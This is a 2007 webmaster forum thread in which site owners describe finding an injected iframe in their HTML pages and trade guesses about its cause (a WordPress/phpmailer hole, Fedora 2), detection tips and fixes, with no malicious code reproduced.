Malicious Code in My Website

Forum Moderators: phranque

Message Too Old, No Replies

Malicious Code in My Website

stumbled across this <iframe>

old_expat

4:19 am on Jul 5, 2007 (gmt 0)

I stumbled across this in one of my sites, then checked and found it in another

Then I found this link that warns about it

[garryconn.com...]

Can someone explain how this gets into my pages .. and how I can prevent it and others from happening again.

[edited by: physics at 7:22 pm (utc) on July 5, 2007]
[edit reason] Examplified a domain [/edit]

physics

7:24 pm on Jul 5, 2007 (gmt 0)

It looks like it's a WordPress hack. Looks like the solution is to upgrade to the newest version of WP.

old_expat

2:12 am on Jul 12, 2007 (gmt 0)

That's only one hack. None of my sites run on Wordpress.

The code was in numerous Apache .html files as well.

overhaul

5:39 am on Jul 23, 2007 (gmt 0)

I found the root of the issue (possibly) see...

[wordpress.org...]
[garryconn.com...]

I am working on my wordpress installations, upgrade to 2.2.1 it looks like the issue was in phpmailer

old_expat

7:15 am on Jul 23, 2007 (gmt 0)

It is possible that many people who have this on their pages don't know about it. In June, an estimate of 10,000 websites infected.

On a number of servers at my web host, the malicious code is still being discovered as of today.

I only ran across it on my site by accident.

If you want to know, look in your index.html page between </head> and <body> and see if you have an iframe

If you do, you will probably find it in every index.htm page, in login.php, some includes and in a number of Apache *.html pages as well.

One suggestion is that Fedora 2 OS is vulnerable.

old_expat

5:47 am on Aug 2, 2007 (gmt 0)

BEWARE. I read this message today

"Re. the IFRAME crap, my VPS provider was finally able to remove it after running the script 3 times over 3 days. Unfortunately by the 3rd day, Google had come by and now my site has a warning "this site may harm your computer". Wonderful."